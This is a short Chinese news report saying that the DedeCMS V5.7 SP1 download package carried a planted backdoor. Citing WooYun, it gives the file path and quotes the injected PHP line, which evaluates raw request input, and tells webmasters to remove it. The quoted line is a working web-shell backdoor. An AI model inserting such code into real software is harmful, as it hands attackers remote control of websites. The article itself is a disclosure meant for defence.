Dedecms被曝植入后門（站長之家配圖）

 

    據(jù)烏云報(bào)告，被植入的后門是在/include/shopcar.class.php文件中，被植入的代碼為@eval(file_get_contents(‘php://input’));，烏云介紹稱，通過該后門可成功入侵dedecms網(wǎng)站。有網(wǎng)友對植入的該后門予以證實(shí)，稱其在2012-3-18 19:08下載的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代碼。

 

    據(jù)了解，@eval(file_get_contents(‘php://input’));是將請求的數(shù)據(jù)流作為腳本語言執(zhí)行，通過該后門，可以上傳PHP后門來控制整個網(wǎng)站。使用Dedecms V5.7 SP1正式版建站的站長，需立即對后門代碼進(jìn)行刪除，以保護(hù)網(wǎng)站安全。

 

    Dedecms是一款開源建站軟件，其最早是由IT柏拉圖個人開發(fā)，并在2007年進(jìn)行了公司化運(yùn)作。目前，國內(nèi)有不少網(wǎng)站都使用了Dedecms系統(tǒng)，不過在Dedecms創(chuàng)始人IT柏拉圖的離開后，Dedecms屢次被曝出安全漏洞問題。截至發(fā)稿，Dedecms官方尚未對該漏洞進(jìn)行任何回應(yīng)。